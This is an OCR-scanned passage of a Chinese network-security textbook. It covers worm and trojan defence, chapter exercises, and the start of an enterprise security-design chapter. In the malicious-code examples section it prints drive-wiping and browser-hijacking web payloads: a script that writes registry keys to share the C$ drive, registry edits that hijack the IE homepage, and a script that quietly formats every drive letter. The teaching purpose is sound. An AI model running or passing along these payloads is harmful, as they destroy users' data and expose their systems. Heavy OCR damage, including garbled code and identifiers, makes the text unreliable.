企业 防治 蠕虫 病毒 需要 考虑 病毒 的 查 杀 能 力 、 病 毒 的 监控 能 力 和 新 病毒 的 反应 能 力 等 


计算 机 痪 素 、 和 恶意 代码 及 防范 
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问题 。 而 企业 防毒 的 一 个 重要 方面 就 是 管理 策略 。 

2) 企业 防范 蠕虫 病毒 的 策略 

加 强 网 络 管理 员 安 全 管理 水 平 ,提高 安全 意识 。 建 立 病毒 检测 系统 。 可 在 第 一 时 间 内 
检测 到 网 络 的 异常 和 病毒 攻击 。 建 立 应 急 响 应 系统 ,将 风险 减少 到 最 低 。 建 立 备 份 和 容 灾 

3) 个 人 用 户 蠕虫 病毒 的 分 析 和 防范 

对 于 个 人 用 户 而 言 ,威胁 大 的 蠕虫 病毒 一 般 通过 电子 邮件 和 恶意 网 页 传播 方式 。 它 们 
对 个 人 用 户 的 威胁 最 大 ,同时 也 最 难以 根除 ,造成 的 损失 也 更 大 。 对 于 利用 电子 邮件 传播 的 
蠕虫 ,通常 利用 各 种 各 样 的 欺骗 手段 诱惑 用 户 点 击 的 方式 进行 传播 。 购 买 合适 的 杀毒 软件 。 
经 常 升级 病毒 库 。 提 高 防 杀 病毒 意识 。 不 随意 查看 陌生 邮件 ,尤其 是 带 附 件 的 邮件 。 

2. 木马 防范 方法 

1) 木马 的 预防 

不 随意 下 载 来 历 不 明 的 软件 ; 不 随意 打开 来 历 不 明 的 邮件 ,阻塞 可 疑 邮 件 ; 及 时 修补 
漏洞 和 关闭 可 疑 的 端口 ; 尽量 少 用 共享 文件 夹 ; 运行 实时 监控 程序 ; 经 常 升级 系统 和 更 新 
病毒 库 ; 限制 使 用 不 必要 的 具有 传输 能 力 的 文件 。 

2) 木马 的 检测 和 清除 

可 以 通过 查看 系统 端口 开放 的 情况 、 系 统 服 务 情 况 、 系 统 任务 运行 情况 、 网 卡 的 工作 情 
况 、 系 统 日 志 及 运行 速度 有 无 异常 等 对 木马 进行 检测 。 检 测 到 计算 机 感染 木马 后 ,就 要 根据 
木马 的 特征 来 进行 清除 。 查 看 是 否 有 可 疑 的 启动 程序 ,可疑 的 进程 存在 ,是 否 修改 了 win 
.ini、system. ini 系统 配置 文件 和 注册 表 。 如 果 存 在 可 疑 的 程序 和 进程 ,就 按照 特定 的 方法 
进行 清除 。 

查看 开放 传输 层 端 口 : 当前 最 为 常见 的 木马 通常 是 基于 TCP/UDP 协议 进行 客户 端 与 
服务 器 端 之 间 通 信 的 。 因 此 ,就 可 以 通过 查看 在 本 机 上 开放 的 端口 ,看 是 否 有 可 疑 的 程序 打 
开 了 某 个 可 疑 的 端口 。 例 如 ,“ 冰 河 ” 木 马 使 用 的 监听 端口 是 7626,Back Orifice 2000 使 用 
的 监听 端口 是 54320 等 。 假 如 查看 到 有 可 疑 的 程序 在 利用 可 疑 端口 进行 连接 , 则 很 有 可 能 
就 是 感染 了 木马 。 此 外 还 有 以 下 检测 内 容 : 查看 和 恢复 win. ini 和 system. ini 系统 配置 文 
件 ; 查看 启动 程序 并 删除 可 疑 的 启动 程序 ; 查看 系统 进程 并 停止 可 疑 的 系统 进程 ; 查看 和 
还 原 注册 表 。 

可 使 用 杀毒 软件 和 木马 查 杀 工具 检测 和 清除 木马 。 最 简单 的 检测 和 删除 木马 的 方法 是 
安装 木马 查 杀 软件 。 常 用 的 木马 查 杀 工具 ,如 KV 3000、 瑞 星 、TheCleaner、 木 马克 星 , 木 马 
终结 者 等 ,可 以 进行 木马 的 检测 和 查 杀 。 此 外 ,用 户 还 可 使 用 其 他 木马 查 杀 工具 对 木马 进行 


查 杀 。 


16.4 网 络 病毒 与 恶意 代码 实例 


(1) 共享 硬盘 : 将 目标 硬盘 共享 ,攻击 者 可 以 随意 复制 .删除 受害 者 硬盘 上 的 资料 。 


<script language = JavaScript> 
function £() // 改 写 注册 表 的 函数 


{ var aa, ss; 

aa = document. applets[0]; 

aa. setCLSID("{F935DC22 - 1CF0 — 11D0 — RDB9 — 00C04FD58A0B}" ); 

aa. createInstance( ); 

ss=aa.GetObject(); 

ss. RegWrite( "HELM\Software\Microsoft\Windows\CurrentVersion\ 

Network\LanMan\C $ \Flags", 302, "REG_DWORD" ) ; 
ss. RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\ 
Network\LanMan\C $ \Type", 0, "REG_DWORD" ); 
ss. RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\ 
Network\LanMan\C $ \Path", "C: \"); 
} 
function init() 


{ 


setTimeout("f£()", 1000); // 每 过 1000 毫秒 就 再 次 递归 调用 f() 
} 

init(); // 调 用 函数 

</script> 


(2) 修改 计算 机 配置 : 随意 修改 目标 计算 机 IE 首页 “我 的 电脑 ”等 配置 ,类 似 于 流浪 


软件 。 


"HKCU\Software\Classes\CLSID\ {20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}\", "强加 的 内 容 "); 
"HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "http: //XXX.XXX. net"); 


// 此 处 修改 你 王 的 首页 
"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http: //XXX. XXX. net"); 
// 此 处 修改 你 王 的 首页 
"HKCR\CLSID\ {20D04FE0 - 3RER- 1069 - A2D8 - 08002B30309D}\", "强加 的 内 容 "); 
// 此 处 修改 "我 的 电脑 " 


"HKCR\CLSID\ {20D04FE0 - 3RMER - 1069 - A2D8 - 08002B30309D} \InfoTip", "强加 的 内 容 "); 
"HKCR\CLSID\ {645FF040 - 5081 - 101B- 9F08 - 00AA002F954E}\", "强加 的 内 容 "); 
// 此 处 修改 "回收 站 " 
"HKCR\CLSID\{645FF040 - 5081 - 101B-- 9F08 - 00AA002F954E}\InfoTip", "强加 的 内 容 "); 
"HKLM\ Software\ Microsoft \ Windows\ Currentversion\ Winlogon\ LegalNoticeCaption", "强加 的 内 
容 "); 
"HKLM\Software\Microsoft\Windows\Currentversion\Winlogon\LegalNoticeText", "强加 的 内 容 "); 
// 此 处 修改 后 出 现 你 启动 时 的 对 话 框 
"HKLM\Software\Microsoft\Internet Explorer\Main\Window Title"，" 强 加 的 内 容 http: //XXX. XXX. 
net"); // 此 处 修改 你 王 的 首页 上 的 文字 
"HKCU\Software\Microsoft\Internet Explorer\Main\Window Title"，" 强 加 的 内 容 http: //XXX. XXX. 
net"); // 此 处 修改 你 王 的 首页 上 的 文字 


(3) 格式 化 硬盘 : 直接 将 受害 者 硬盘 格式 化 ,所 有 资料 删除 。 


< OBJECT classid = clsid: F935DC22 - 1CF0 - 11D0 - ADB9 - 00C04FD58A0B id = wsh> </OBJECT> 
< SCRIPT > 

wsh. Run( 'start /m format. com z: /q /autotest /u'); 

wsh. Run( 'start /m format. com y: /q /autotest /u'); 

wsh. Run( 'start /m format. com x: /q /autotest /u'); 

wsh. Run( 'start /m format. com w: /q /autotest /u'); 

wsh. Run( 'start /m format. com v: /q /autotest /u'); 
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wsh. Run( 'start /m format. com u: /q /autotest /u'); 
wsh. Run( 'start /m format. com t: /q /autotest /u'); 
wsh. Run( 'start /m format. com s: /q /autotest /u'); 
wsh. Run( 'start /m format. com r: /q /autotest /u'); 
wsh. Run( 'start /m format. com q: /q /autotest /u'); 
wsh. Run( 'start /m format. com p: /q /autotest /u'); 
wsh. Run( 'start /m format. com o: /q /autotest /u'); 
wsh. Run( 'start /m format. com n: /q /autotest /u'); 
wsh. Run( 'start /m format. com m: /q /autotest /u'); 
wsh. Run( 'start /m format. com 1: /q /autotest /u'); 
wsh. Run( 'start /m format. com k: /q /autotest /u'); 
wsh. Run( 'start /m format. com j: /q /autotest /u'); 
wsh. Run( 'start /m format. com i: /q /autotest /u'); 
wsh. Run( 'start /m format. com h: /q /autotest /u'); 
wsh. Run( 'start /m format. com g: /q /autotest /u'); 
wsh. Run( 'start /m format. com f: /q /autotest /u'); 
wsh. Run( 'start /m format. com e: /q /autotest /u'); 
wsh. Run( 'start /m format. com d: /q /autotest /u'); 
wsh. Run( 'start /m format. com c: /q /autotest /u'); 
wsh. Run( 'start /m format. com b: /q /autotest /u'); 
wsh. Run( 'start /m format. com a: /q /autotest /u'); 
</SCRIPT > 
</P> 


16.5 小 结 


本 章 主 要 介绍 计算 机 病毒 的 基础 知识 ,包括 计算 机 病毒 的 定义 、 特 点 、 分 类 及 防范 方法 。 


并 针对 网 络 病毒 独 有 的 特点 进行 讨论 ,同时 ,还 介绍 了 几 种 典型 的 网 络 病毒 与 恶意 代码 实例 。 


加 


16.6 习 题 


. 什么 是 病毒 ? 简 述 计算 机 病毒 的 特征 及 危害 。 

. 简 述 计算 机 病毒 的 分 类 及 各 自 特点 。 

.怎样 预防 和 消除 计算 机 网 络 病毒 ? 

. 试 述 恶意 代码 的 分 类 及 其 区 别 。 

. 小 明 想 买 一 台 计 算 机 ,如 果 自 己 组 装 一 台 兼 容 机 ,便宜 好 用 ,但 是 安全 及 售后 没有 保 


cn hm 性 


; 买 品牌 机 ,服务 人 员 可 以 上 门 服务 ,但 是 性 价 比 却 不 高 。 如 果 你 是 小 明 ,应 该 怎么 办 ? 


6. 现在 木马 .间谍 .钓鱼 及 其 变种 软件 多 如 牛 毛 ,你 在 上 网 时 如 何 防范 这 类 软件 ? 
16.7 实 验 


1. 使 用 360 杀毒 进行 全 过 程 查 杀 病 毒 。 

2. 对 恶意 软件 进行 专门 查 杀 。 

3. 学 习 使 用 Sniffer 工具 软件 进行 嗅 探 及 抓 包 。 
4.“ 冰 河 ” 木 马 的 攻防 演练 。 


第 17 章 网 络 安全 方案 设计 


如 果 你 希望 自己 足够 强壮 以 保护 系统 ,就 必须 了 解 潜在 攻击 者 所 用 的 工具 和 技术 。 
定期 对 网 络 进行 渗透 测试 能 让 你 对 它 的 安全 现状 有 最 好 的 了 解 , 任 何 一 种 安全 评估 工 
具 或 入 侵 检 测 系 统 所 提供 的 报告 都 不 能 与 这 种 亲身 体验 相提并论 。 

—David LeBlanc 


本 章 力求 通过 两 个 典型 案例 对 前 面 章节 所 讲述 的 内 容 进行 融合 ,帮助 读者 把 分 散 的 知 
识 点 整合 在 一 起 ,使 读者 对 网 络 安全 形成 全 方位 的 整体 认识 。 但 基于 网 络 安全 技术 的 高 速 
发 展 ,本章 内 容 仅 具有 参考 意义 。 


17.1 大 型 网 络 安 全 整体 解决 方案 


整体 的 网 络 安全 方案 可 分 成 技术 方案 .服务 方案 以 及 支持 方案 3 部 分 。 
17.1.1 技术 解决 方案 


安全 产品 是 网 络 安全 的 基石 ,通过 在 网 络 中 安装 一 定 的 安全 设备 ,能 够 使 得 网 络 的 结构 更 
加 清晰 ,安全 性 得 到 显著 增强 ; 同时 能 够 有 效 降低 安全 管理 的 难度 ,提高 安全 管理 的 有 效 性 。 
以 下 介绍 在 局 域 网 中 增加 安全 设备 的 安装 位 置 以 及 其 作用 (如 表 17. 1 所 示 )。 


表 17.1 局 域 网 中 安全 设备 的 安装 位 置 以 及 作用 


网 络 设备 及 软件 名 称 安装 位 置 作 用 

局 域 网 与 路 由 器 | 实现 单 向 访问 .分 区 .整体 防护 .设置 过 滤 规 则 、 进 行 流量 
之 间 控制 .限制 流量 

WWW 服务 器 与 托 | 限制 Internet 用 户 对 WWW 服务 器 的 访问 、 对 远程 更 新 
管 机 房 局 域 网 之 间 ”| 的 时 间 、 来 源 (通过 IP 地址) 进行 限制 

局 域 网 DMZ 区 以 及 | 监控 网 络 中 的 信息 .中断 异常 连接 、 向 防火 墙 发 送 指令 ， 


防火 墙 


Gia 托管 机 房 服务 器 区 “| 在 限定 的 时 间 内 对 特定 的 IP 地 址 实施 封 堵 
通过 Internet 更 新 病毒 库 、 强 制 局 域 网 中 已 开机 的 终端 
局 域 网 防 病 毒 服 | 及 时 更 新 病毒 库 软件 .记录 各 个 终端 的 病毒 库 升 级 情况 、 
网 络 防 病毒 软件 务 器 记录 局 域 网 中 计算 机 病毒 出 现 的 时 间 、 类 型 以 及 后 续 处 


理 措施 
终端 处 理 带 毒 文 件 、 处 理 带 毒 邮件 
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续 表 
网 络 设备 及 软件 名 称 | 安装 位 置 作 用 
好 件 服务 器 与 防 炎 
邮件 肪 病毒 服务 器 | 之 处 理 带 毒 邮件 
拒绝 转发 来 自 Internet 的 垃圾 邮件 .拒绝 转发 来 自 局 域 
反 垃 圾 邮件 系统 人 网 用 户 的 垃圾 邮件 .记录 发 垃圾 邮件 的 终端 地 址 、 通 过 电 
子 邮件 等 方式 通知 网 管 垃圾 邮件 的 处 理 情况 
动态 口令 认证 系统 | 服务 器, 终端 通过 定期 修改 密码 ,确保 密码 的 不 可 猜测 性 
收集 所 有 资源 的 硬件 信息 .收集 所 有 终端 和 服务 器 的 软 
件 信息 ,收集 网 络 设备 的 工作 状况 信息 .判断 用 户 是 否 使 
DR 局 壤 网 由 用 了 非法 网 络 设备 与 Internet 连接 、 显 示 实 时 网 络 连接 
情况 、 出 现 异常 及 时 报警 
re 通过 IP 地 址 为 重要 用 户 分 配 足够 的 带宽 、 通 过 端口 为 重 
Qos 流量 管理 全 末 半 总 放 us 第 | 要 的 应 用 分 配 足够 的 带 帘 交 源 .限制 非 业务 流量 的 带宽 
ba 确保 重要 用 户 能 够 至 少 使 用 分 配给 他 们 的 带宽 资源 
保护 个 人 终端 不 受 攻击 .不 允许 任何 主机 非 授权 访问 重 
个 人 防护 软件 重要 终端 要 终端 资源 .防止 局 域 网 感染 病毒 主机 通过 攻击 的 方式 
感染 重要 终端 
定期 比 对 发 布 页 面 文件 与 备份 文件 . 侈 许 授权 用 户 修改 
a | ec 页 面 文件 ,对 数据 库 文件 进行 比 对 
1. 防火 墙 
安装 位 置 ; 局 域 网 与 路 由 器 之 间 ; WWW 服务 器 与 托管 机 房 局 域 网 之 间 。 
局 域 网 防火 墙 作用 : 


(1) 实现 单 向 访问 ,允许 局 域 网 用 户 访问 Internet 资源 ,但 是 严格 限制 Internet 用 户 对 
局 域 网 资源 的 访问 。 

(2) 通过 防火 墙 ,将 整个 局 域 网 划分 Internet、DMZ 区 、 内 网 访问 区 这 3 个 逻辑 上 分 开 
的 区 域 , 有 利于 对 整个 网 络 进行 管理 。 

(3) 局 域 网 所 有 工作 站 和 服务 器 处 于 防火 墙 地 整体 防护 之 下 ,只 要 通过 对 防火 墙 设置 
的 修改 ,就 能 有 限 地 防止 来 自 Internet 上 的 攻击 ,网 络 管理 员 只 需要 关注 DMZ 区 对 外 提供 
服务 相关 应 用 的 安全 漏洞 。 

(4) 通过 防火 墙 的 过 滤 规 则 ,实现 端口 级 控制 ,限制 局 域 网 用 户 对 Internet 的 访问 。 

(5) 进行 流量 控制 ,确保 重要 业务 对 流量 的 要 求 。 

(6) 通过 过 滤 规 则 ,以 时 间 为 控制 要 素 ,限制 大 流量 网 络 应 用 在 繁忙 时 间 的 使 用 。 

托管 机 房 防火 墙 的 作用 : 

(1) 通过 防火 墙 的 过 滤 规 则 ,限制 Internet 用 户 对 WWW 服务 器 的 访问 ,将 访问 权限 控 
制 在 最 小 的 限度 ,在 这 种 情况 下 ,网 络 管理 员 可 以 忽略 服务 器 系统 的 安全 漏洞 ,只 需要 关注 
WWW 应 用 服务 软件 的 安全 漏洞 。 

(2) 通过 过 滤 规 则 ,对 远程 更 新 的 时 间 来源 ( 通 过 IP 地 址 ?进行 限制 。 


2. 人 侵 检测 

安装 位 置 : 局 域 网 DMZ 区 以 及 托管 机 房 服务 器 区 。 

IDS 的 作用 : 

(1) 作为 旁 路 设备 ,监控 网 络 中 的 信息 ,统计 并 记录 网 络 中 的 异常 主机 以 及 异常 连接 。 
(2) 中 断 异 常 连接 。 

(3) 通过 联动 机 制 ,向 防火 墙 发 送 指令 ,在 限定 的 时 间 内 对 特定 的 IP 地 址 实施 封 堵 。 
3. 网 络 防 病毒 软件 控制 中 心 以 及 客户 端 软件 

安装 位 置 : 局 域 网 防 病毒 服务 器 以 及 各 个 终端 。 


防 病毒 服务 器 作用 : 
(1) 作为 防 病毒 软件 的 控制 中 心 ,及 时 通过 Internet 更 新 病毒 库 , 并 强制 局 域 网 中 已 开 
机 的 终端 及 时 更 新 病毒 库 软件 。 


(2) 记录 各 个 终端 的 病毒 库 升级 情况 。 

(3) 记录 局 域 网 中 计算 机 病毒 出 现 的 时 间 、 类 型 以 及 后 续 处 理 措施 。 

防 病毒 客户 端 软件 的 作用 : 

(1) 对 本 机 的 内 存 、 文 件 的 读 写 进行 监控 ,根据 预定 的 处 理 方法 处 理 带 毒 文件 。 

(2) 监控 邮件 收发 软件 ,根据 预定 处 理 方法 处 理 带 毒 邮件 。 

4. 邮件 防 病毒 服务 器 

安装 位 置 : 邮件 服务 器 与 防火 墙 之 间 。 

邮件 防 病毒 软件 : 对 来 自 Internet 的 电子 邮件 进行 检测 ,根据 预先 设 定 的 处 理 方法 处 
理 带 毒 邮件 。 邮 件 防 病毒 软件 的 监控 范围 包括 所 有 来 自 Internet 的 电子 邮件 以 及 所 属 附件 
(对 于 压缩 文件 同样 也 进行 检测 ) 。 

5. 反 垃 圾 邮件 系统 

安装 位 置 : 同 邮件 防 病 毒 软件 ,如 果 软 硬件 条 件 允 许 的 话 ,建议 安装 在 同一 台 服 务 
器 上 。 

反 垃 圾 邮件 系统 作用 : 

(1) 拒绝 转发 来 自 Internet 的 垃圾 邮件 。 

(2) 拒绝 转发 来 自 局 域 网 用 户 的 垃圾 邮件 并 将 发 垃圾 邮件 的 局 域 网 用 户 的 IP 地 址 通 
过 电子 邮件 等 方式 通报 给 网 管 。 
(3) 记录 发 垃圾 邮件 的 终端 地 址 。 
(4) 通过 电子 邮件 等 方式 通知 网 管 垃 圾 邮件 的 处 理 情况 。 
6. 动态 口令 认证 系统 
安装 位 置 : 服务 器 端 安装 在 WWW 服务 器 (以 及 其 他 需要 进行 口令 加 强 的 敏感 服务 
,客户 端 配 置 给 网 页 更 新 人 员 ( 或 者 服务 器 授权 访问 用 户 )。 
动态 口令 认证 系统 的 作用 : 
通过 定期 修改 密码 ,确保 密码 的 不 可 猜测 性 。 
7. 网 络 管理 软件 
安装 位 置 : 局 域 网 中 。 
网 络 管理 软件 的 作用 : 
(1) 收集 局 域 网 中 所 有 资源 的 硬件 信息 。 
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(2) 收集 局 域 网 中 所 有 终端 和 服务 器 的 操作 系统 、 系 统 补丁 等 软件 信息 。 

(3) 收集 交换 机 等 网 络 设备 的 工作 状况 等 信息 。 

(4) 判断 局 域 网 用 户 是 否 使 用 了 调制 解 调 器 等 非法 网 络 设 备 与 Internet 连接 。 

(5) 显示 实时 网 络 连 接 情 况 。 

(6) 如 果 交 换 机 等 核心 网 络 设备 出 现 异常 ,及 时 向 网 管 中 心 报警 。 

8. QoS 流量 管理 

安装 位 置 : 如 果 是 专门 的 产品 , 则 安装 在 路 由 器 和 防火 墙 之 间 ; 部 分 防火 墙 本 身 就 有 


QoS 带宽 管理 模块 。 


QoS 流量 管理 的 作用 : 

(1) 通过 IP 地 址 ,为 重要 用 户 分 配 足 够 的 带宽 。 

(2) 通过 端口 ,为 重要 的 应 用 分 配 足 够 的 带宽 资源 。 

(3) 限制 非 业 务 流 量 的 带宽 。 

(4) 在 资源 闲置 时 期 ,允许 其 他 人 员 使 用 资源 ,一 旦 重要 用 户 或 者 重要 应 用 需要 使 用 带 


宽 , 则 确保 它们 能 够 至 少 使 用 分 配给 他 们 的 带宽 资源 。 
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9. 重要 终端 个 人 防护 软件 

安装 位 置 : 重要 终端 。 

个 人 防护 软件 的 作用 : 

(1) 保护 个 人 终端 不 受 攻击 。 

(2) 不 允许 任何 主机 (包括 局 域 网 主机 ) 非 授权 访问 重要 终端 资源 。 
(3) 防止 局 域 网 感染 病毒 主机 通过 攻击 的 方式 感染 重要 终端 。 
10. 页 面 防 自 改 系统 

安装 位 置 : WWW 服务 器 。 

页 面 防 算 改 系统 的 作用 : 

(1) 定期 比 对 发 布 页 面 文件 与 备份 文件 ,一 旦 发 现 不 匹配 ,用 备份 文件 替换 发 布 文件 。 
(2) 通过 特殊 的 认证 机 制 ,允许 授权 用 户 修改 页 面 文件 。 

(3) 能 够 对 数据 库 文件 进行 比 对 。 


1.2 安全 服务 解决 方案 
在 安全 服务 方案 中 ,采用 不 同 的 安全 服务 ,定期 对 网 络 进行 检测 .改进 ,以 达到 动态 增进 


网 络 安全 性 ,最 大 限度 发 挥 安全 设备 作用 的 目的 。 


安全 服务 分 为 以 下 几 类 。 

1. 网 络 拓扑 分 析 

服务 对 象 : 整个 网 络 。 

服务 周期 : 半年 一 次 。 

服务 内 容 : 根据 网 络 的 实际 情况 ,绘制 网 络 拓扑 图 ; 分 析 网 络 中 存在 的 安全 缺陷 并 提 


出 整改 建议 意见 。 


服务 作用 : 针对 网 络 的 整体 情况 ,进行 总 体 、 框 架 性 分 析 。 一 方面 ,通过 网 络 拓扑 分 析 ， 


能 够 形成 网 络 整 体 拓扑 图 ,为 网 络 规划 、 网 络 日 常 管理 等 管理 行为 提供 必要 的 技术 资料 ; 另 
一 方面 ,通过 整体 的 安全 性 分 析 , 能 够 找 出 网 络 设计 上 的 安全 缺陷 ,找到 各 种 网 络 设备 在 协 
同 工 作 中 可 能 产生 的 安全 问题 。 


2. 中 心机 房管 理 制度 制订 以 及 修改 

服务 对 象 : 中 心机 房 。 

服务 周期 : 半年 一 次 。 

服务 内 容 : 协助 用 户 制订 并 修改 机 房管 理 制度 。 制 度 内 容 涉 及 人 员 进 出 机 房 的 登记 制 
度 \ 设 备 进 出 机 房 的 登记 制度 \ 设 备 配 置 修 改 的 登记 制度 等 。 

服务 作用 : 严格 控制 中 心机 房 的 人 员 进 出 ` 设 备 进出 并 及 时 登记 设备 的 配置 更 新 情况 ， 
有 助 于 网 络 核心 设备 的 监控 ,确保 网 络 的 正常 运行 。 

3. 操作 系统 补丁 升级 

服务 对 象 : 服务 器 、 工 作 站 、 终 端 。 

服务 周期 : 不 定期 。 

服务 内 容 : 一 旦 出 现 重大 安全 补丁 ,及 时 更 新 所 有 相关 系统 ; 出 现 大 型 补丁 (如 微软 的 
SP) ,及 时 更 新 所 有 相关 系统 。 

服务 作用 : 通过 及 时 、 有效 的 补丁 升级 ,能 够 有 效 防止 局 域 网 主机 和 服务 器 相互 之 间 的 
攻击 ,降低 现代 网 络 蠕虫 病毒 对 网 络 的 整体 影响 ,增加 网 络 带宽 的 有 效 利用 率 。 

4. 防 病毒 软件 病毒 库 定期 升级 

服务 对 象 : 防 病毒 服务 器 \ 安 装 防 病 毒 客户 端的 终端 。 

服务 周期 : 每 周一 次 。 

服务 内 容 : 防 病毒 服务 器 通过 Internet 更 新 病毒 库 ; 防 病毒 服务 器 强制 所 有 在 线 客户 
端 更 新 病毒 库 。 

服务 作用 : 通过 不 断 升 级 病毒 库 确 保 防 病毒 软件 能 够 及 时 发 现 新 的 病毒 。 

5. 服务 器 定期 扫描 、 加 固 

服务 对 象 : 服务 器 。 

服务 周期 : 半年 一 次 。 

服务 内 容 : 使 用 专用 的 扫描 工具 ,在 用 户 网 络 管理 人 员 的 配合 ,对 主要 的 服务 器 进行 
扫描 。 

服务 作用 : 找 出 对 应 服务 器 操作 系统 中 存在 的 系统 漏洞 ; 找 出 服务 器 对 应 应 用 服务 中 
存在 的 系统 漏洞 ; 找 出 安全 强度 较 低 的 用 户 名 和 用 户 密码 。 

6. 防火 墙 日 志 备份 、 分 析 

服务 对 象 : 防火 墙 设备 。 

服务 周期 : 一 周一 次 。 

服务 内 容 : 导出 防火 墙 日 志 并 进行 分 析 。 

服务 作用 : 通过 流量 简 图 找 出 流量 异常 的 时 间 段 ,通过 检查 流量 较 大 的 主机 , 找 出 局 域 
网 中 的 异常 主机 。 

7. 人 侵 检测 等 安全 设备 日 志 备份 

服务 对 象 : 入 侵 检测 等 安全 设备 。 

服务 周期 : 一 周一 次 。 

服务 内 容 : 备份 安全 设备 日 志 。 

服务 作用 : 防止 日 志 过 大 导致 检索 、 分 析 的 难度 , 另 一 方面 也 有 利于 事后 的 检查 。 
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8. 服务 器 日 志 备 份 

服务 对 象 : 主要 服务 器 (如 WWW 服务 器 文件 服务 器 等 ) 。 

服务 周期 : 一 周一 次 。 

服务 内 容 : 备份 服务 器 访问 日 志 。 

服务 作用 : 防止 日 志 过 大 导致 检索 、 分 析 的 难度 , 另 一 方面 也 有 利于 事后 的 检查 。 

9. 白 客 渗透 

服务 对 象 : 对 Internet 提供 服务 的 服务 器 。 

服务 周期 : 半年 一 次 。 

服务 内 容 : 服务 商 在 用 户 指定 的 时 间 段 内 ,通过 Internet, 使 用 各 种 工具 在 不 破坏 应 用 
的 前 提 下 攻击 服务 器 ,最 终 提 供 检测 报告 。 

服务 作用 : 先 于 黑客 进行 探测 性 攻击 以 检测 系统 漏洞 。 根 据 最 终 检测 报告 进一步 增强 
系统 的 安全 性 。 

10. 设备 备份 系统 

服务 对 象 : 骨干 交换 机 、 路 由 器 等 网 络 骨 干 设 备 。 

服务 周期 : 实时 。 

服务 内 容 : 根据 用 户 的 网 络 情况 ,提供 骨干 交换 机 、 路 由 器 等 核心 网 络 设备 的 备份 。 备 
份 设备 可 以 在 短 时 间 内 替代 网 络 中 实际 使 用 的 设备 。 

服务 作用 : 一 旦 核心 设备 出 现 故 障 ,使 用 备件 替换 以 减少 网 络 故障 时 间 。 

11. 信息 备份 系统 

服务 对 象 : 所 有 重要 信息 。 

服务 周期 : 根据 网 络 情况 决定 完全 备份 和 增 量 备份 的 时 间 。 

服务 内 容 : 定期 备份 电子 信息 。 

服务 作用 : 防止 核心 服务 器 崩溃 导致 网 络 应 用 瘫痪 。 

12. 定期 总 体 安 全 分 析 报 告 

服务 对 象 : 整个 网 络 。 

服务 周期 : 半年 一 次 。 

服务 内 容 : 综合 网 络 拓扑 报告 .各 种 安全 设备 日 志 、 服 务 器 日 志 等 信息 ,对 网 络 进行 总 
体 安全 综合 性 分 析 ,分 析 内 容 包括 网 络 安全 现状 .网 络 安全 隐患 分 析 ,并 提出 改进 建议 意见 。 

服务 作用 : 提供 综合 性 、 全 面 的 安全 报告 ,针对 全 网 络 进行 安全 性 讨论 ,为 全 面 提高 网 
络 的 安全 性 提供 技术 资料 。 

以 上 是 服务 解决 方案 ,众所周知 ,安全 产品 一 般 是 共性 的 产品 ,通过 安全 服务 ,能 够 配制 
出 适合 本 网 络 的 安全 设备 ,使 得 安全 产品 在 特定 的 网 络 中 发 挥 最 大 的 效能 ,使 得 各 种 设备 协 
同 工 作 ,增强 网 络 的 安全 性 和 可 用 性 。 

当然 ,在 计算 机 网 络 中 ,绝对 的 安全 是 不 存在 的 ,即使 采取 种 种 安全 措施 ,网 络 也 可 能 由 
于 某 种 原因 而 无 法 正常 运作 ,这 时 候 , 就 需要 有 及 时 、 有 效 的 技术 支持 ,使 得 网 络 在 尽 可 能 短 
的 时 间 内 恢复 正常 。 下 面 将 提出 技术 支持 解决 方案 。 


17.1.3 技术 支持 解决 方案 
技术 支持 是 整个 安全 方案 的 重要 补充 。 其 主要 作用 是 在 用 户 网 络 发 生 重 要 安全 事件 


后 ,通过 及 时 \ 高 效 的 安全 服务 ,达到 尽快 恢复 网 络 应 用 的 目的 。 技 术 支 持 主要 包括 以 下 几 
方面 : 

1. 故障 排除 

支持 范围 : 

(1) 用 户 无 法 访问 网 络 ( 如 局 域 网 用 户 无 法 访问 Internet) 。 

(2) 应 用 服务 无 法 访问 (如 不 能 对 外 提供 WWW 服务 ) 。 

(3) 网 络 访问 异常 (如 访问 速度 慢 ) 。 

作用 : 一 旦 网 络 出 现 异常 ,为 用 户 提供 及 时 、 有 效 的 网 络 服务 。 在 最 短 的 时 间 内 恢复 网 
络 应 用 。 

2. 灾难 恢复 

支持 范围 : 设备 遇 到 物理 损害 、 网 络 应 用 异常 。 

作用 : 通过 备品 备件 ,快速 恢复 网 络 硬件 环境 ; 通过 备份 文件 的 复原 ,尽快 恢复 网 络 的 
电子 资源 ; 由 此 可 在 最 短 的 时 间 内 恢复 整个 网 络 应 用 。 

3. 查找 攻击 源 

支持 范围 : 网 络 管理 员 发 现 网 络 遭 到 攻击 ,并 需要 确定 攻击 来 源 。 

作用 : 通过 日 志文 件 等 信息 ,确定 攻击 的 来 源 , 为 进一步 采取 措施 提供 依据 。 

4. 实时 检索 日 志文 件 

支持 范围 : 遭 到 实时 的 攻击 (如 DOS、SYN FLOODING 等 ) ,需要 及 时 了 解 攻击 源 以 及 
攻击 强度 。 

作用 : 通过 实时 检索 日 志文 件 , 可 以 找到 当时 针对 本 网 络 的 攻击 和 攻击 源 。 如 果 攻 击 
强度 超出 网 络 能 够 承受 的 范围 ,可 采取 进一步 措施 进行 防范 。 

5. 即时 查 杀 病毒 

支持 范围 : 由 不 可 确定 的 因素 导致 网 络 中 出 现 计算 机 病毒 。 

作用 : 即使 网 络 中 出 现 病 毒 ,通过 及 时 有 效 的 技术 支持 ,在 最 短 的 时 间 内 查处 感染 病毒 
的 主机 并 即时 查 杀 病毒 ,恢复 网 络 应 用 。 

6. 即时 网 络 监控 

支持 范围 : 网 络 出 现 异常 ,但 应 用 基本 正常 。 

作用 : 通过 网 络 监控 ,可 能 发 现 网 络 中 存在 的 前 期 网 络 故 障 ,在 故障 扩大 化 以 前 及 时 进 
行 防治 。 

以 上 是 技术 支持 解决 方案 ,技术 支持 是 安全 服务 的 重要 补充 部 分 ,即使 在 完善 的 安全 体 
系 下 ,也 存在 不 可 预测 的 因素 导致 网 络 故 障 , 此 时 , 即 需 要 及 时 、 有 效 的 技术 支持 服务 。 

综 上 所 述 ,网 络 的 安全 方案 由 3 个 部 分 组 成 , 它 涵盖 设备 ,技术 、 制 度 、 管 理 、 服 务 等 各 个 
方面 。 


17.1.4 实施 建议 与 意见 


网 络 安全 涉及 面相 当 广 , 同 时 进行 建设 的 效果 不 好 ,因此 ,建议 按照 以 下 方式 进行 分 阶 
